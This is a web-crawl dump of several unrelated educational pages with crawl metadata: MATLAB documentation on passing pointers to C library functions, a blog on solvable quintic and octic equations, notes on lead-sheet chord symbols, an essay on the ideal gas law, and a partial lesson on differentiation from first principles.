ull,null,null,2,null,2,null,2,null,10,null,2,null,2,null,2,null,6,null,2,null,2,null,2,null,6,null,6,null,6,null,2,null,2,null,2,null,2,null,2,null,2,null,6,null,6,null,6,null,2,null,2,null,2,null,6,null,6,null,null,null,2,null,null,null,1,null,2,null,2,null,2,null,2,null,null,null,10,null,6,null,2,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-29T21:46:20Z\",\"WARC-Record-ID\":\"<urn:uuid:2b70513a-9549-434f-b40b-9e7a588441d4>\",\"Content-Length\":\"65166\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f462dba9-f703-4e1b-a4ae-379f27318367>\",\"WARC-Concurrent-To\":\"<urn:uuid:62c4e4a6-1b88-466f-ae4f-7ac3be4876e0>\",\"WARC-IP-Address\":\"109.71.54.18\",\"WARC-Target-URI\":\"https://lovelylittlelemmas.rjprojects.net/limits-as-equalisers-of-products/\",\"WARC-Payload-Digest\":\"sha1:H3FZKR546PJKXIABWFHZP5CJY6D5KVDL\",\"WARC-Block-Digest\":\"sha1:VNCG5FBFBCX4EHYYYNWXUWEZFE2XU36K\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107905965.68_warc_CC-MAIN-20201029214439-20201030004439-00676.warc.gz\"}"}
https://se.mathworks.com/help/matlab/matlab_external/pass-pointers.html
[ "## Pass Pointers Examples\n\n### `multDoubleRef` Function\n\nThe `multDoubleRef` function in the `shrlibsample` library multiplies the input by `5`.\n\n```EXPORTED_FUNCTION double *multDoubleRef(double *x) { *x *= 5; return x; }```\n\nThe input is a pointer to a `double`, and the function returns a pointer to a `double`. The MATLAB® function signature is:\n\nReturn TypeNameArguments\n```[lib.pointer, doublePtr]````multDoubleRef``(doublePtr)`\n\n### Pass Pointer of Type double\n\nThis example shows how to construct and pass a pointer to C function `multDoubleRef`.\n\nLoad the library containing the function.\n\n```if not(libisloaded('shrlibsample')) addpath(fullfile(matlabroot,'extern','examples','shrlib')) loadlibrary('shrlibsample') end```\n\nConstruct a pointer, `Xptr`, to the input argument, `X`.\n\n```X = 13.3; Xptr = libpointer('doublePtr',X);```\n\nVerify the contents of `Xptr`.\n\n`get(Xptr)`\n``` Value: 13.3000 DataType: 'doublePtr' ```\n\nCall the function and check the results.\n\n```calllib('shrlibsample','multDoubleRef',Xptr); Xptr.Value```\n```ans = 66.5000 ```\n\n`Xptr` is a handle object. Copies of this handle refer to the same underlying object and any operations you perform on a handle object affect all copies of that object. However, `Xptr` is not a C language pointer. Although it points to `X`, it does not contain the address of `X`. The function modifies the Value property of `Xptr` but does not modify the value in the underlying object `X`. The original value of `X` is unchanged.\n\n`X`\n```X = 13.3000 ```\n\n### Create Pointer Offset from Existing lib.pointer Object\n\nThis example shows how to create a pointer to a subset of a MATLAB vector `X`. The new pointer is valid only as long as the original pointer exists.\n\nCreate a pointer to a vector.\n\n```X = 1:10; xp = libpointer('doublePtr',X); xp.Value```\n```ans = 1×10 1 2 3 4 5 6 7 8 9 10 ```\n\nUse the lib.pointer plus operator (`+`) to create a pointer to the last six elements of `X`.\n\n```xp2 = xp + 4; xp2.Value```\n```ans = 1×6 5 6 7 8 9 10 ```\n\n### Multilevel Pointers\n\nMultilevel pointers are arguments that have more than one level of referencing. A multilevel pointer type in MATLAB uses the suffix `PtrPtr`. 
For example, use `doublePtrPtr` for the C argument ```double **```.\n\nWhen calling a function that takes a multilevel pointer argument, use a `lib.pointer` object and let MATLAB convert it to the multilevel pointer.\n\n### `allocateStruct` and `deallocateStruct` Functions\n\nThe `allocateStruct` function in the `shrlibsample` library takes a `c_structPtrPtr` argument.\n\n```EXPORTED_FUNCTION void allocateStruct(struct c_struct **val) { *val=(struct c_struct*) malloc(sizeof(struct c_struct)); (*val)->p1 = 12.4; (*val)->p2 = 222; (*val)->p3 = 333333; }```\n\nThe MATLAB function signatures are:\n\nReturn TypeNameArguments\n`c_structPtrPtr``allocateStruct``(c_structPtrPtr)`\n`voidPtr` `deallocateStruct``(voidPtr)`\n\n### Pass Multilevel Pointer\n\nThis example shows how to pass a multilevel pointer to a C function.\n\nLoad the library containing `allocateStruct` and `deallocateStruct`.\n\n```if not(libisloaded('shrlibsample')) addpath(fullfile(matlabroot,'extern','examples','shrlib')) loadlibrary('shrlibsample') end```\n\nCreate a `c_structPtr` pointer.\n\n`sp = libpointer('c_structPtr');`\n\nCall `allocateStruct` to allocate memory for the structure.\n\n`res = calllib('shrlibsample','allocateStruct',sp)`\n```res = struct with fields: p1: 12.4000 p2: 222 p3: 333333 ```\n\nFree the memory created by the `allocateStruct` function.\n\n`calllib('shrlibsample','deallocateStruct',sp)`\n\n### Return Array of Strings\n\nSuppose that you have a library, `myLib`, with a function, `acquireString`, that reads an array of strings. The function signature is:\n\nReturn TypeNameArguments\n`char**``acquireString``(void)`\n`char** acquireString(void)`\n\nThe following pseudo-code shows how to manipulate the return value, an array of pointers to strings.\n\n```ptr = calllib(myLib,'acquireString') ```\n\nMATLAB creates a `lib.pointer` object `ptr` of type `stringPtrPtr`. This object points to the first string. To view other strings, increment the pointer. For example, to display the first three strings, type:\n\n```for index = 0:2 tempPtr = ptr + index; tempPtr.Value end ```\n```ans = 'str1' ans = 'str2' ans = 'str3' ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5740452,"math_prob":0.8329379,"size":3958,"snap":"2022-40-2023-06","text_gpt3_token_len":1070,"char_repetition_ratio":0.15604451,"word_repetition_ratio":0.033101045,"special_character_ratio":0.24279939,"punctuation_ratio":0.14705883,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9905726,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T05:46:49Z\",\"WARC-Record-ID\":\"<urn:uuid:a08ae386-e852-444c-bed9-5613fe09e30e>\",\"Content-Length\":\"88347\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dea307df-c03a-4d1d-840d-a185f7677c68>\",\"WARC-Concurrent-To\":\"<urn:uuid:af698f80-94aa-41e8-9784-9ec87899209d>\",\"WARC-IP-Address\":\"23.221.210.185\",\"WARC-Target-URI\":\"https://se.mathworks.com/help/matlab/matlab_external/pass-pointers.html\",\"WARC-Payload-Digest\":\"sha1:67QOKV77XVNMPY55H2NKQBFFMVYJHZE5\",\"WARC-Block-Digest\":\"sha1:KXJ5IDDBRDMPXXBUKCEMZJUVBPLZD2LV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337537.25_warc_CC-MAIN-20221005042446-20221005072446-00219.warc.gz\"}"}
https://tpiezas.wordpress.com/tag/radicals/
[ "## Posts Tagged ‘radicals’\n\n### Solvable Quintics, Part 2\n\nIn the 1850’s, Jerrard showed that a Tschirnhausen transformation could reduce in radicals the general quintic into one missing three terms,", null, "$\\text{(1)}\\;\\; x^5+5ax+4b = 0$\n\nIn 1864, Bring independently would do the same. It is now known as the Bring-Jerrard quintic.  Such a reduction is important because it proved that a formula for the general quintic does exist, albeit it went beyond radicals and used elliptic functions, as was first done by Hermite.\n\nIn 1885, Runge et al showed that all solvable quintics with rational coefficients have the form,", null, "$x^5+5\\,\\frac{4u+3}{u^2+1}xz^4+4\\,\\frac{(2u+1)(4u+3)}{u^2+1}z^5 = 0$\n\nA century later, Spearman and Williams gave their version,", null, "$x^5+5\\,\\frac{4v+3}{v^2+1}xz^4+4\\,\\frac{-2v+11}{\\,v^2+1}z^5 = 0$\n\nSo which is it? It turns out they are two sides of the same coin. Using the Spearman-Williams parametrization, let,", null, "$a = \\frac{4v+3}{v^2+1}z^4$", null, "$b = \\frac{-2v+11}{\\,v^2+1}z^5$\n\nand eliminating v between them using resultants, one gets,", null, "$\\text{(2)}\\;\\; 4az^6+8bz^5-5a^2z^2+2abz-b^2 = 0$\n\nThis is one of the simplest sextic resolvents for the quintic:  given {a, b}, if one can solve for z, then is solvable. Since is only a quadratic for b, we can easily solve for it,", null, "$b = az+4z^5+2z\\sqrt{(a+z^4)(-a+4z^4)}$\n\nStill let,", null, "$a= \\frac{4v+3}{v^2+1}z^4$\n\nand substituting it into the positive case of the square root yields the b of the 1885 version, while the negative case gives the b of the 1994 one, proving that they are indeed two sides of the same coin.\n\n### A Tale of Three Solvable Octics\n\nThe following three cute irreducible octics are solvable,", null, "$\\text{(1)}\\;\\; x^8-5x-5 = 0$", null, "$\\text{(2)}\\;\\; x^8-44x-33 = 0$", null, "$\\text{(3)}\\;\\; x^8-x^7+29x^2+29 = 0$\n\nHowever, each needs to be solved in a different way: they need a quadratic, quartic, and septic subfield, respectively.\n\nThe first is the easiest, it factors over", null, "$\\sqrt{5}$ into two quartics.  The second does not factor over a square root extension, but factors into four quadratics,", null, "$x^2+vx -(2v^3-7v^2+5v+33)/13 = 0$\n\nwhere the coefficients are determined by the quartic,", null, "$v^4+22v+22 = 0$\n\nThe command,\n\nResultant[x^2+vx -(2v^3-7v^2+5v+33)/13 , v^4+22v+22 ,v]\n\ndone in Mathematica or in www.wolframalpha.com will eliminate the variable v and recover .  The first two octics are by this author.  (Any other example for the second kind with small coefficients?)\n\nThe third (by Igor Schein) is the hardest, as it needs a septic subfield. Interestingly though, the solution involves the 29th root of unity. 
Given,", null, "$x^8-x^7+29x^2+29 = 0$\n\nThen,", null, "\\begin{aligned} x_1 &= (1+(a-b-c-d+e-f-g))/8\\\\ x_2 &= (1-(a-b-c-d-e+f+g))/8\\\\ x_3&= (1-(a+b-c+d+e-f+g))/8\\\\ x_4&= (1+(a+b-c+d-e+f-g))/8\\\\ x_5&= (1-(a+b+c-d+e+f-g))/8\\\\ x_6&= (1+(a+b+c-d-e-f+g))/8\\\\ x_7&= (1-(a-b+c+d-e-f-g))/8\\\\ x_8&= (1+(a-b+c+d+e+f+g))/8 \\end{aligned}\n\nwhere the 7 constants {a, b, c, d, e, f, g} is the square root of the appropriate root", null, "$z_i$ of the solvable septic,", null, "$z^7-7z^6-2763z^5-19523z^4+1946979z^3+34928043z^2+\\\\119557031z-3247^2 = 0$\n\nnamely,", null, "\\begin{aligned} a &\\approx \\sqrt{ -26.98}\\\\ b &\\approx \\sqrt{ -26.95}\\\\ c &\\approx \\sqrt{ -19.71}\\\\ d &\\approx \\sqrt{ -4.78}\\\\ e &\\approx \\sqrt{ 0.08}\\\\ f &\\approx \\sqrt{ 36.91}\\\\ g &\\approx \\sqrt{ 48.43}\\\\ \\end{aligned}\n\nNote that,", null, "$(8x_3-1)+(8x_4-1)+(8x_5-1)+(8x_6-1) = -4e$\n\nhence one can use the roots of this octic to express the roots of its resolvent septic, and vice versa.  In terms of radicals, Peter Montgomery expressed the septic roots", null, "$z_i$ as,", null, "\\begin{aligned}\\tfrac{1}{4}(z-1) &= 2(w^{11}+w^{13}+w^{16}+w^{18})-2(w+w^{12}+w^{17}+w^{28})\\\\ &+(w^3+w^7+w^{22}+w^{26})-(w^2+w^5+w^{24}+w^{27})\\\\ &+(w^4+w^{10}+w^{19}+w^{25})-(w^8+w^9+w^{20}+w^{21}) \\end{aligned}\n\nwhere w is any complex root of unity (excluding w = 1) such that", null, "$w^{29}=1$. For example,", null, "$w = \\exp(2\\pi i\\cdot4/29)$ will yield the value for", null, "$z_1 \\approx -26.98$,  and so on.\n\n### A Family of Solvable Quintics and Septics\n\nDefine,", null, "$x = \\frac{-\\sqrt{2}\\,\\eta(2\\tau)}{\\zeta_{48}\\,\\eta(\\tau)}$\n\nwhere", null, "$\\eta$ is the Dedekind eta function, and", null, "$\\zeta_{48}$ is the 48th root of unity.  Then for", null, "$\\tau = \\frac{1+\\sqrt{-d}}{2}$ for d = {47, 103}, x is a root of the quintics,", null, "$x^5-2x^4+2x^3-x^2+1 = 0$", null, "$x^5-2x^4+3x^3-3x^2+x+1 = 0$\n\nrespectively. Note that the class number h(d) of both is 5.  It turns out these belong to a family of solvable quintics found by Kondo and Brumer,", null, "$x^5-2x^4+2x^3-x^2+1 = nx(x-1)^2$\n\nfor any n, and where the two examples are n = {0, -1}.  A similar one for septics can be deduced from the examples in Kluner’s A Database For Number Fields as,", null, "$x^7-2x^6+x^5-x^4-5x^2-6x-4 = n(x-1)x^2(x+1)^2$\n\nwith discriminant,", null, "$d = 4^4(4n^3+99n^2+34n+467)^3$ .\n\nThe case n = 0 implies d = 467 and, perhaps not surprisingly, the class number of h(-467) = 7. However, since 467 does not have form 8m+7, then the eta quotient will be not be an algebraic number of degree h(-d).\n\nTo find a solvable family, it’s almost as if all you need is to find one right solvable equation, affix the right n-multiple of a polynomial on the RHS, and the whole family will remain solvable.\n\n### Solvable quintics\n\nHere is a nifty sufficient but not necessary condition on whether a quintic is solvable in radicals or not.  
Given,", null, "$x^5+10cx^3+10dx^2+5ex+f = 0$\n\nIf there is an ordering of its roots such that,", null, "$x_1 x_2 + x_2 x_3 + x_3 x_4 + x_4 x_5 + x_5 x_1 - \\\\(x_1 x_3 + x_3 x_5 + x_5 x_2 + x_2 x_4 + x_4 x_1) = 0$\n\nor alternatively, its coefficients are related by,", null, "$-25c^6-40c^3d^2-16d^4+35c^4e+\\\\28cd^2 e -11c^2e^2+e^3-2c^2df-2def+cf^2 = 0$\n\nthen is solvable as,", null, "$x = z_1^{1/5}+z_2^{1/5}+z_3^{1/5}+z_4^{1/5}$\n\nwhere the", null, "$z_i$ are the roots of the simple quartic,", null, "$z^4+fz^3+(2c^5-5c^3e-4d^2e+ce^2+2cdf)z^2-c^5fz+c^{10} = 0$\n\nNote that in fact is the constant term of Cayley’s resolvent sextic and is only quadratic in f.  Using another relation among the", null, "$x_i$, Dummit’s resolvent has a constant term that is already a quartic in f, hence the choice of relation matters.\n\nExample 1: This family of quintics by this author satisfies ,", null, "$x^5+10x^3+5(n^2+3n+18)x^2-5(n^3+n^2+15n-14)x+\\\\(n^4-n^3+37n^2+441) = 0$\n\nLet n = 1, and we have,", null, "$x^5+10x^3+110x^2-15x+478 = 0$\n\nQuartic is,", null, "$z^4+478z^3+11994z^2-478z+1 = 0$\n\nsuch that,", null, "$x = z_1^{1/5}+z_2^{1/5}+z_3^{1/5}+z_4^{1/5} = -4.50991\\dots$\n\nExample 2: Another good example of is Emma Lehmer’s quintic,", null, "$y^5 +n^2y^4-(2n^3+6n^2+10n+10)y^3+\\\\(n^4+5n^3+11n^2+15n+5)y^2+(n^3+4n^2+10n+10)y+1$\n\nThe linear transformation,", null, "$y = x-n^2/5$\n\nwill reduce it into the form of , and it will then be seen its coefficients obey . As a particular example, let n = 5 and we have the reduced form,", null, "$x^5-710x^3+11005x^2-59640x+108701 = 0$\n\nLet its roots be,", null, "$(x_1, x_2, x_3, x_4, x_5) \\approx (-33.15,\\; 4.83,\\; 12.16,\\; 4.99,\\; 11.16)$\n\nand we find that indeed it obeys .\n\nUnfortunately, no similar simple relation between the coefficients of a solvable septic, or 7th degree equation, is yet known." ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9475464,"math_prob":0.99995613,"size":1163,"snap":"2019-35-2019-39","text_gpt3_token_len":281,"char_repetition_ratio":0.11216566,"word_repetition_ratio":0.02,"special_character_ratio":0.22871883,"punctuation_ratio":0.12288135,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99997616,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-16T16:11:53Z\",\"WARC-Record-ID\":\"<urn:uuid:4a92eb79-74b6-49a9-9d95-49bef194b566>\",\"Content-Length\":\"62736\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:312e949e-6869-458b-9f45-55638154a3c1>\",\"WARC-Concurrent-To\":\"<urn:uuid:27f23fd7-a60f-43fc-b106-4267d098ca15>\",\"WARC-IP-Address\":\"192.0.78.13\",\"WARC-Target-URI\":\"https://tpiezas.wordpress.com/tag/radicals/\",\"WARC-Payload-Digest\":\"sha1:2PCYJZBGIEUSFVS4EE7S5WCFLMVM5UOW\",\"WARC-Block-Digest\":\"sha1:37HSSBQMOBGNDW4SOQBXYXO2U6P5CPOF\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514572879.28_warc_CC-MAIN-20190916155946-20190916181946-00484.warc.gz\"}"}
http://musictheory.pugetsound.edu/mt21c/LeadSheetSymbols.html
[ "Lead-sheet symbols (also known as “lead-sheet notation” and “lead-sheet chord symbols”) are often used as shorthand for chords in popular music and jazz. These symbols allow a guitarist or pianist to choose how to “voice” the chords, i.e., how they want to arrange the notes.", null, "Lead-sheet symbols for triads communicate the root and quality of a chord.\n\n Lead-sheet Symbol Chord Quality Notes in the Chord $\\left.\\text{F}\\right.$ major $\\text{F}$–$\\text{A}$–$\\text{C}$ $\\left.\\text{G}\\text{m}\\right.$ minor $\\text{G}$–$\\text{B}^♭$–$\\text{D}$ $\\left.\\text{D}^{\\circ}{}\\right.$ diminished $\\text{D}$–$\\text{F}$–$\\text{A}^♭$ $\\left.\\text{C}{+}\\right.$ augmented $\\text{C}$–$\\text{E}$–$\\text{G}^♯$\n\nHere is a musical example with lead-sheet symbols and guitar tablature.\n\nAs you can see in the example above, major triads are represented by an uppercase letter ($\\left.\\text{A}\\right.$, $\\left.\\text{E}\\right.$, and $\\left.\\text{D}\\right.$) while minor triads are represented with the root in uppercase followed by a lowercase “m” (e.g., $\\left.\\text{F}^♯{}\\text{m}\\right.$). Diminished triads are represented by including the diminished symbol ($\\left.\\text{}^{\\circ}{}\\right.$) after the chord root (e.g., $\\left.\\text{C}^{\\circ}{}\\right.$) while augmented triads are represented by including the augmented symbol after the root ($\\left.\\text{C}{+}\\right.$)." ]
[ null, "http://musictheory.pugetsound.edu/mt21c/images/unit1/triads-voicings-of-C-major-triad-B.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88519967,"math_prob":0.9970616,"size":1443,"snap":"2019-43-2019-47","text_gpt3_token_len":459,"char_repetition_ratio":0.20847811,"word_repetition_ratio":0.025806451,"special_character_ratio":0.32640332,"punctuation_ratio":0.15498155,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99848694,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-22T15:14:21Z\",\"WARC-Record-ID\":\"<urn:uuid:c41b3353-c557-43b1-8ea3-c615c5708ca6>\",\"Content-Length\":\"43940\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:842ee6dd-0b7f-4a21-9a71-6f96b25e6a88>\",\"WARC-Concurrent-To\":\"<urn:uuid:91b8db04-8b9b-446b-9bb4-e6261daff1d0>\",\"WARC-IP-Address\":\"207.207.126.61\",\"WARC-Target-URI\":\"http://musictheory.pugetsound.edu/mt21c/LeadSheetSymbols.html\",\"WARC-Payload-Digest\":\"sha1:MDKF4DTBK6IBURAQA3BQYE73JSZQ3YWI\",\"WARC-Block-Digest\":\"sha1:R64JKNV3JG2JG7J57UASNT2NEODNFM44\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496671363.79_warc_CC-MAIN-20191122143547-20191122172547-00411.warc.gz\"}"}
https://afoggyone.tripod.com/chem451-L1.html
[ "Some facts, Information, and History of the Concept of Gases The ideal gas equation is PV=nRT. This is derived from Boyle's Law, Charles' Law, and Avogadro's hypothesis. The standard units used for this equation include the PASCAL for pressure. Pascals (Pa) are measured in Newtons per meter squared. Also used are the ATMOSPHERE (atm), of which one atm is defined as 101.325 kPa, and the barr, which has been arbitrarily set as equal to 100 kPa. The final pressure unit is the torr, defined as one seven-hundred and sixtieth of an atmosphere, and roughly equivalent to one millimeter of Mercury on the old manometer scales. The SI unit of volume is of course the LITER, where one millileter equals the volume of one cubic centimeter. Temperature is measured by the KELVIN (note that it is not DEGREE Kelvins, only Kelvins). One Kelvin equals one degree celsius plus 273.15, and one degree celsius equals one degree fahrenheit subtracted by thirty-two degrees and then multiplied by five-nineths. This ends our discussion on the standards of working with gasses. The experimentation leading to the Ideal Gas Law began in the seventeenth century through the work of Robert Boyle. Boyle discovered that when holding the temperature of a closed system constant, volume increased inversely to pressure (causing the graph of a hyperbola in the first quadrant). When Boyle then increased the temperature, the graph of the hyperbola shifted to the right, while a decrease shifted the graph to the left. This discovery, that pressure and volume were inversely proportional with temperature acting only as a modifier, was the first third of the ideal gas puzzle. The next piece was assembled by Charles in the eighteenth century. Instead of holding the temperature constant for his experiments, Charles chose to make the pressure constant. In doing so he discovered that volume and temperature were directly proportional. By playing with the equation, Charles was able to determine that Volume equalled the temperature multiplied by a constant. Eventually it was realized that this equation could be further simplified to volume equals temperature times a constant divided by pressure. But what was this constant? It was a difficult number to pin down, seeming to vary in increments depending on the situation. Eventually this constant was determined and explained through the use of n. N is defined as \"the amount of substance\" in PV=nRT and is usually measured in moles, where one mole is equal to the number of atoms of the most common isotope of carbon in 12.000 grams. This is called Avogadro's Constant and is 6.022 * 10^23 moles^-1. This number, discovered by Avogadro, was based on his observation that if the volume, temperature, and pressure are the same for two gasses, then n is the same for those same two gasses, leading to PV=nRT. The next topic to be dealt with at this time involves the concept of Partial Pressures. Rarely in life does one encounter just one gas; air, for example, is approximately seventy-nine percent nitrogen, twenty percent oxygen, and less than one percent of argon, carbon dioxide, and the rest. So what exactly is \"air pressure\" then? The answer to this is thankfully simple. Air pressure is the cumulative sum of the pressure from all of the other gases. This can be extended to say that the pressure on any surface is equal to the pressures exerted onto it by all gases present, or the partial pressures of the gases. 
The partial pressure of a gas is determined through PV=nRT, just as with anything else, although here n refers specifically to the amount of only that gas present. By summing the partial pressures the total pressure is arrived at easily, and through a few simple computations so too can the molecular weight of the gas. By dividing the partial pressure by the total pressure or the partial n by the total n, a Mole Fraction, abbreviated Xi can be arrived upon. The sum of the quantities of the mole fraction multiplied by the molecular weight of the gas for which the mole fractions were calculated yields the molecular weight of the gases in question. Thust ends the first lesson." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9576131,"math_prob":0.9812202,"size":4138,"snap":"2021-31-2021-39","text_gpt3_token_len":880,"char_repetition_ratio":0.13328496,"word_repetition_ratio":0.00433526,"special_character_ratio":0.20130497,"punctuation_ratio":0.10165184,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9977201,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-01T06:27:34Z\",\"WARC-Record-ID\":\"<urn:uuid:0ceba34c-03c2-4cc5-826e-450a36d9581a>\",\"Content-Length\":\"19488\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fe59b351-aa83-4fc0-b6da-ca9989e8f860>\",\"WARC-Concurrent-To\":\"<urn:uuid:c9ed3128-f6bd-4f14-9e9a-9d1fa6dff42c>\",\"WARC-IP-Address\":\"209.202.252.105\",\"WARC-Target-URI\":\"https://afoggyone.tripod.com/chem451-L1.html\",\"WARC-Payload-Digest\":\"sha1:2FU5MGROCWBDZGHL2WW76GEYBCV4BRDN\",\"WARC-Block-Digest\":\"sha1:LIQXECALOAFZYW3MFXCRNBCF5NBI36QV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154163.9_warc_CC-MAIN-20210801061513-20210801091513-00607.warc.gz\"}"}
https://alevelmaths.co.uk/pure-maths/calculus/differentiation-from-first-principle/
[ "# Differentiation From First Principle\n\nContents\n\n### Summary\n\n4 steps to work out differentiation from the First Principle:\n\n1. Give increments to both x & y i.e", null, "$\\Delta x,\\quad \\Delta y$.\n2. Find change", null, "$\\Delta y$ of y.\n3. Find rate of change of y with respect to x i.e", null, "$\\frac { \\Delta y }{ \\Delta x }$  or", null, "$\\frac { dy }{ dx }$.\n4. Take the limit of", null, "$\\frac { \\Delta y }{ \\Delta x }$  as", null, "$\\Delta x\\quad \\rightarrow \\quad 0$.\n\nWe know that the gradient of a line is always constant and can be found from the following equation:", null, "$Gradient\\quad =\\quad \\frac { { y }_{ 2 }\\quad -\\quad { y }_{ 1 } }{ { x }_{ 2 }\\quad -\\quad { x }_{ 1 } }$", null, "$=\\quad \\frac { difference\\quad in\\quad y\\quad coordinate }{ difference\\quad in\\quad x\\quad coordinate }$\n\nA curve is not a straight line, hence its gradient is still not constant. It is changing from one point to another point on the curve. So we don’t have a set gradient for a curve.\n\nConsider two points", null, "$P({ x }_{ 1 },\\quad { y }_{ 1 })$ and", null, "$Q({ x }_{ 2 },\\quad { y }_{ 2 })$ on a curve in ‘Fig 1’.", null, "The gradient of the straight line:", null, "$PQ\\quad =\\quad \\frac { { y }_{ 2 }\\quad -\\quad { y }_{ 1 } }{ { x }_{ 2 }\\quad -\\quad { x }_{ 1 } }$\n\nIf we move from point Q towards point P, we are actually moving from", null, "${ x }_{ 2 }$ towards", null, "${ x }_{ 1 }$ and from", null, "$y_{ 2 }$ towards", null, "$y_{ 1 }$.\n\nHence when Q approaches , the line PQ becomes the tangent line at P.\n\nWe can say that now the gradient of line PQ is ‘m’ which is also known as the gradient of the curve at point P. Also ‘m’ is the gradient of the tangent at P.\n\nTherefore, we define the gradient of a curve at a point P to be the gradient of the tangent drawn at that point.\n\nWe now find the gradient of a curve by the method known as ‘differentiation from the first principle’.\n\n#### What is differentiation from the first principle?\n\nTo start of with, consider a curve with equation", null, "$y\\quad =\\quad { x }^{ 2 }$. Let P and Q be two points on the curve with coordinates P(x, y) and", null, "$Q(x\\quad +\\quad \\Delta x,\\quad y\\quad +\\quad \\Delta y)$ where", null, "$\\Delta x$ and", null, "$\\Delta y$ represent small increments in x and y respectively.\n\nFor:", null, "$y\\quad =\\quad { x }^{ 2 }$\n\nStep 1:", null, "$y\\quad +\\quad \\Delta y\\quad =\\quad { (x\\quad +\\quad \\Delta x) }^{ 2 }$", null, "$y\\quad +\\quad \\Delta y\\quad =\\quad { x }^{ 2 }\\quad +\\quad { (\\Delta x) }^{ 2 }\\quad +\\quad 2x(\\Delta x)$\n\nStep 2:\n\nMake", null, "$\\Delta y$ the subject", null, "$\\Delta y\\quad =\\quad { x }^{ 2 }\\quad +\\quad { (\\Delta x) }^{ 2 }\\quad +\\quad 2x(\\Delta x)\\quad -\\quad y$\n\nSubstitute", null, "$y\\quad =\\quad { x }^{ 2 }$  in the above equation", null, "$\\Delta y\\quad =\\quad { x }^{ 2 }\\quad +\\quad { (\\Delta x) }^{ 2 }\\quad +\\quad 2x(\\Delta x)\\quad -\\quad { x }^{ 2 }$", null, "$\\Delta y\\quad =\\quad { (\\Delta x) }^{ 